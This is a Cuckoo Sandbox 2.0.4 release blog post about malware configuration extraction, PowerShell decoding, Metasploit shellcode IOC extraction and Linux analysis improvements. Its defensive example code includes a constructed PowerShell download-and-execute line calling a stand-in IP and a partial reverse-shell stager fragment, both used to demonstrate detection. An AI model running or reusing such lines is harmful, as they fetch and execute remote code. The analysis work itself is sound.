Automated Malware Analysis

Cuckoo Sandbox 2.0.4

  • September 06, 2017
  • Jurriaan Bremer

Since our 2.0.0 release in March of this year we've been busy shaping the new Cuckoo Package style of releases and further improving a number of features in Cuckoo. In the meantime we've somewhat quietly released a couple of minor versions that fix dozens of bugs.


With 2.0.4 we once again ship a number of important improvements that simplify and improve the overall user experience, while new functionality surfaces more of the information collected during an analysis.

Following is an overview of the smaller and bigger changes that come with this release:

  • Malware Configuration Extraction, part 1
  • Linux Analysis improvements
  • Miscellaneous improvements
  • Upcoming features
  • Conclusions

Malware Configuration Extraction, part 1

Now that Cuckoo has become the go-to solution for generic behavioral analysis, the time has come to also focus on specific payloads and variants. This release includes a number of new features to facilitate that.

(This is part 1 because future blog posts will build on it.)

Yara integration

Cuckoo now ships with Yara by default, after working together with Victor Manuel Alvarez; Yara is therefore no longer an optional feature. While integrating it we also identified CVE-2017-11328, a heap overflow in the Yara core that can be triggered through two different code paths in the .NET module.

Extracted category

We're introducing a new Extracted category, which allows recursive extraction of potentially interesting information. For example, Cuckoo reports the command line of each executed process. Very often, as in almost every sample from Unit42's PowerShell blog post, PowerShell is invoked with the -EncodedCommand (or -enc) parameter, which takes a base64-encoded UTF-16LE string containing the PowerShell payload.

In such cases we naturally want to see the PowerShell script that was actually executed rather than its base64 form. Cuckoo now extracts the decoded PowerShell script and analyzes it as if it were a dropped file (now called an extracted file).
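As an added example (not code from the Cuckoo project), the following shows the decoding step described above: finding the -EncodedCommand parameter in a command line, base64-decoding its value as UTF-16LE, and recursing into the decoded script when it itself invokes powershell -enc. The abbreviation handling follows what powershell.exe accepts (-e, -ec, -en, -enc, ...); the sample command line is constructed, including the 198.51.100.7 address.

```python
import base64

MAX_DEPTH = 4  # stop runaway recursion on deliberately nested payloads


def is_encoded_param(token):
    """True for -EncodedCommand and the abbreviations powershell.exe accepts
    (-e, -ec, -en, -enc, ...; case-insensitive; '/' works as well as '-')."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    t = token[1:].lower()
    return t == "ec" or "encodedcommand".startswith(t)


def decode_encoded_command(blob):
    """Decode an -EncodedCommand value: base64 over a UTF-16LE string.
    Returns None if the token is not valid base64 or not valid UTF-16LE."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if not raw or len(raw) % 2:  # UTF-16 needs an even byte count
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def extract_powershell(cmdline, depth=0):
    """Return every decoded PowerShell script reachable from `cmdline`,
    outermost first, recursing into scripts that again call powershell -enc."""
    found = []
    if depth > MAX_DEPTH:
        return found
    # Quotes never occur in base64 or in the parameter name, so dropping them
    # lets us tokenize on whitespace without a full Windows command-line parser.
    tokens = cmdline.replace('"', " ").replace("'", " ").split()
    for i, tok in enumerate(tokens[:-1]):
        if not is_encoded_param(tok):
            continue
        script = decode_encoded_command(tokens[i + 1])
        if script is None:
            continue  # e.g. "-e" followed by something that is not a blob
        found.append(script)
        for line in script.splitlines():
            found.extend(extract_powershell(line, depth + 1))
    return found


def encode_command(script):
    """Inverse of decode_encoded_command; used only to build the sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed two-stage sample (not a captured command line): the outer
# -EncodedCommand unwraps to a second powershell -enc invocation.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')"
OUTER = "powershell.exe -NoP -W Hidden -enc " + encode_command(INNER)
SAMPLE_CMDLINE = 'powershell -ep bypass -EncodedCommand "%s"' % encode_command(OUTER)

if __name__ == "__main__":
    for n, script in enumerate(extract_powershell(SAMPLE_CMDLINE)):
        print("stage %d: %s" % (n, script))
```

Each decoded stage is what Cuckoo would hand on as an extracted file; the depth limit matters because a decoder that recurses on attacker-controlled output needs a stopping condition.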

Extractor Signatures

Extractor Signatures operate on Extracted artefacts after a specialized Yara rule has identified them. Such Extractors can in turn generate other extracted files.

PowerShell Yara rules & Extractors

We've added a number of new Yara rules to the Cuckoo Community repository that identify specific PowerShell payloads and, together with Extractor Signatures, extract x86 shellcode from those payloads.

Unicorn Engine integration

After extracting a number of x86 shellcode payloads we concluded that they are mostly Metasploit payloads (at least in the sample set from the Unit42 blog post).

Some of these payloads were Shikata ga nai-encoded, so we also did a basic integration of Unicorn Engine, a lightweight CPU emulator framework, to decode the encoded shellcode payloads. There is still a bug in Unicorn Engine that prevents certain Shikata ga nai payloads from being decoded properly - feel free to help us out on that!

Shellcode Disassembly Framework

While looking for a comprehensive yet accurate shellcode disassembly framework we didn't find much, so we wrote our own: egghatch. Currently it is only used to render the shellcode disassembly, but in the future the Unicorn Engine-based decoding functionality may move into egghatch and grow a wider array of decoding options.

Metasploit IoC Extraction

Having access to the plaintext shellcode, it becomes possible to extract IOCs - in particular where the payload connects to, be it an IP/port combination, a hostname, or a URL. We've added a basic Yara rule that identifies a couple of Metasploit payloads, along with a Metasploit Shellcode Signature that extracts the IOCs into the final Cuckoo report.

Following is a screenshot of a meterpreter/reverse_tcp payload that was found inside a Powerfun Injector payload.
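As an added example (not Cuckoo's own Yara rule or signature), this is the kind of IOC extraction the paragraph describes for one payload type: Metasploit's x86 reverse_tcp stager builds its sockaddr_in with two `push` instructions followed by `mov esi, esp`, so the connect-back IP and port sit at fixed offsets around those opcodes. The byte pattern is the assumption the code rests on; the sample shellcode is a constructed fragment (not a working payload) and the report layout is illustrative, not Cuckoo's schema.

```python
import re
import socket
import struct

# Byte pattern of the sockaddr_in setup in Metasploit's x86 reverse_tcp stager
# (block_reverse_tcp), as assumed here:
#   68 <ip, 4 bytes>         push <sin_addr>             (bytes in address order)
#   68 02 00 <port, 2 bytes> push <sin_port:sin_family>  (AF_INET=2, port big-endian)
#   89 e6                    mov esi, esp                (esi -> struct sockaddr_in)
REVERSE_TCP = re.compile(
    rb"\x68(?P<ip>.{4})\x68\x02\x00(?P<port>.{2})\x89\xe6", re.DOTALL
)


def extract_reverse_tcp(shellcode):
    """Return [(ip, port), ...] for every reverse_tcp connect-back found in
    the (already decoded) shellcode. Returns [] when nothing matches, which is
    also what a still-encoded (e.g. Shikata ga nai) payload yields: decode first."""
    iocs = []
    for m in REVERSE_TCP.finditer(shellcode):
        ip = socket.inet_ntoa(m.group("ip"))
        port = struct.unpack(">H", m.group("port"))[0]
        iocs.append((ip, port))
    return iocs


def to_report(shellcode):
    """Shape the hits the way a signature would mark them in a report
    (illustrative layout, not Cuckoo's actual schema)."""
    return [{"family": "metasploit", "type": "reverse_tcp", "host": ip, "port": port}
            for ip, port in extract_reverse_tcp(shellcode)]


# Constructed sample: a stager fragment around the sockaddr setup. It is NOT a
# runnable payload; only the three instructions the regex keys on matter here.
SAMPLE_SHELLCODE = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"  # block_api prologue
    b"\x68\xc6\x33\x64\x07"      # push 0x076433c6  -> 198.51.100.7
    b"\x68\x02\x00\x1f\x90"      # push 0x901f0002  -> AF_INET, port 8080
    b"\x89\xe6"                  # mov esi, esp
    b"\x6a\x10\x56\x57"          # push 16; push esi; push edi (connect arguments)
    b"\x68\x99\xa5\x74\x61"      # push hash("ws2_32.dll", "connect")
    b"\xff\xd5"                  # call ebp
)

if __name__ == "__main__":
    for ioc in to_report(SAMPLE_SHELLCODE):
        print(ioc)
```

Anything that obfuscates the stager (an encoder, or a compiler-generated variant of the same logic) defeats a byte pattern like this, which is why the decoding step with Unicorn Engine comes first in the pipeline.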


Linux Analysis improvements

This release brings many improvements to the Linux Analysis component. Some new features were merged from pull requests made by the community (thanks to doomedraven and Bondey!) and some deprecated code was removed from the codebase (e.g., the missing probelkm kernel module).

For behavioral logging, SystemTap is now the primary method of analysis. SystemTap compiles scripts into kernel modules, which can be harder for malware running inside the sandbox to detect than any userland analysis component. SystemTap uses the Linux Kprobes interface to hook and log system calls as they are made on behalf of the analyzed sample.

Following is an example of the behavioral output as displayed by Cuckoo:


Fully logging the environment variables in execve(2) (instead of the earlier strace-like [/* X vars */] placeholder) is one of several SystemTap patches we've already contributed upstream. Other patches and ideas we've run into are still pending release or implementation (either by upstream or by us).

The pid-following logic previously located in the probelkm kernel module has now been implemented in our SystemTap script. Process creation and command-line information is handled by the SystemTap log parser (one of our Processing modules) and displayed by Cuckoo as follows:


Furthermore, the Linux Analyzer has been updated to be compatible with the new Cuckoo Agent version that was already in use on the Windows platform. All Linux Analysis components now work out of the box as detailed in the updated Linux Guest installation documentation page.

Some of the other improvements to the Linux analysis component include:

  • Snapshot loading and KVM support have been added to the QEMU machinery, for a significant performance boost.
  • The SystemTap regular expression parser has been replaced by a partitioning parser with unit tests for correct parsing behavior.
  • The SystemTap parser correctly parses and displays struct and array arguments and error constants.
  • The behavioral analysis log skips any system calls made by the analyzer process itself.
  • A bug in the QEMU machinery code that could cause a guest image to be destroyed without warning has been fixed.
  • sflock now supports and recognizes ELF executables and .sh scripts.
  • ELF parsing has been added to the static analysis component (thanks to doomedraven).

With these new improvements we hope to bring new life to the Linux Analysis component of Cuckoo Sandbox and bring it up to speed with its Windows counterpart. Stay tuned!

Miscellaneous tweaks

Other improvements brought to our users in this release:

  • InetSim support works once again as the Cuckoo Rooter has been patched and tested (thanks doomedraven).
  • Various Unicode-related issues have been resolved and as such Cuckoo should now handle different Unicode filepaths better (both on the Host as well as on the Guest).
  • The random files generated for each analysis run are now placed in the My Documents directory rather than on the Desktop by default, so they no longer confuse our users (and hopefully this change will not re-confuse you!). Screenshots taken by Cuckoo are now no longer randomized for each analysis.
  • A potential XSS when submitting a "specially crafted" URL in the Cuckoo Web Interface has been resolved. Thanks to Roy Kokkelkoren, Niels van Eijck, and Wouter Katz for reporting it.

Upcoming features

It's been a while, and our community has been asking for it for a few years now, but we've finally picked up official zer0m0n (originally developed by CONIX Security) integration within Cuckoo Sandbox. Please stay tuned for the 2.0.5 release ;-)


Conclusions

This release took longer than expected, but hopefully our users love it as much as we do. Thanks to our great team for putting it all together.

As you can see we've also updated our website! All your needs should be one click away now.
